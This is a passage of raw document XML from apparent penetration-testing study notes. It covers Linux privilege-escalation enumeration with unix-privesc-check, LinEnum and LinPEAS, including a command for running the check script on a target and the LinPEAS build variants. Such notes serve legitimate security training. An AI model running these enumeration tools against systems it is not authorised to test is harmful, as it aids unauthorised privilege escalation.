                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014CA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="634"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">unix-privesc-check</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014CB">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014CC">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As shown in the listing above, the script supports "standard" and "detailed" mode. Based on the provided information, the standard mode appears to perform a speed-optimized process and should provide a reduced number of false positives. Therefore, in the following example we are going to transfer the script to the target system and use the standard mode to redirect the entire output to a file called </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">output.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014CD">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014CE">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">./unix-privesc-check standard &gt; output.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014CF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014D0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The script performs numerous checks for permissions on common files. For example, the following excerpt reveals configuration files that are writable by non-root users:</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014D1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3995738" cy="1453578"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="427" name="image426.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image426.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId393"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3995738" cy="1453578"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014D2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014D3">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This output reveals that anyone on the system can edit </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. This is quite significant as it allows attackers to easily</w:t>
      </w:r>
      <w:hyperlink r:id="rId394">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId395">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">elevate their privileges</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> or create user accounts on the target. We will demonstrate this later in the Module.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014D4">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">There are many other tools worth mentioning that are specifically tailored for Linux privilege escalation information gathering, including</w:t>
      </w:r>
      <w:hyperlink r:id="rId396">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId397">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">LinEnum</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
      <w:hyperlink r:id="rId398">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId399">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">LinPeas</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which have been actively developed and enhanced over recent years.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014D5">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Although these tools perform many automated checks, we should bear in mind that every system is different, and unique one-off system changes will often be missed by these types of tools. For this reason, it's important to check for unique configurations that can only be caught by manual inspection, as illustrated in the previous section.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014D6">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the next Learning Unit, we are going to learn how to act on the information we obtained through enumeration in order to elevate our privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014D7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014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D9">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_49k2mc1txxlf" w:id="176"/>
      <w:bookmarkEnd w:id="176"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LinPEAS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014DA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014DB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Warning:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014DC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="234"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I see CVE-2021-3560 highlighted in yellow a lot, but I have yet to see it actually being the attack vector</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014DD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014DE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here is the </w:t>
      </w:r>
      <w:hyperlink r:id="rId400">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">release page</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014DF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1395"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">linpeas.sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> — The most compatible, works across most Linux systems.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014E0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1395"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">linpeas_fat.sh — Contains more features and checks but is much larger (15.8MB).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014E1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1395"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">linpeas_small.sh — Very lightweight, minimal version.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014E2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1395"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">linpeas_linux_amd64 — Use if the target is 64-bit Linux (most modern distros).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014E3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1395"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">linpeas_linux_386 — For 32-bit Linux.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014E4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1395"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">linpeas_linux_arm/arm64 — For ARM devices (like Raspberry Pi).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014E5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1395"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">linpeas_darwin_amd64 — For macOS 64-bit.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014E6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014E7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> linpeas.sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> or linpeas_fat.sh if space isn’t an issue. If you know the exact architecture, use the binary version like linpeas_linux_amd64.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014E8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014E9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014EA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_4fy35hfito8l" w:id="177"/>
      <w:bookmarkEnd w:id="177"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to save linPEAS output to sublime text with color</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014EB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014EC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sometimes, linPEAS output is too much and you want to be able to use CTRL + F or more. So, I found a way to save the output to a file and read it in sublime text. THIS INCLUDES READING IT ON your windows host machine, which has a huge screen so it makes reading it SO much quicker and faster.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014ED">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014EE">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">First, you have to install ansiescape package on sublime text in order to read ANSI text:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014EF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="192"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Go to tools on the top of sublime text</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014F0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="192"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Click on "install package" on the bottom if it's there</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="192"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then go to "command palette" on the top of tools</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014F2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="192"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then search for "install package"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014F3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="192"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then search for "ansiescape" </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014F4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014F5">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then, you have to save linPEAS output to a file:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="209"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
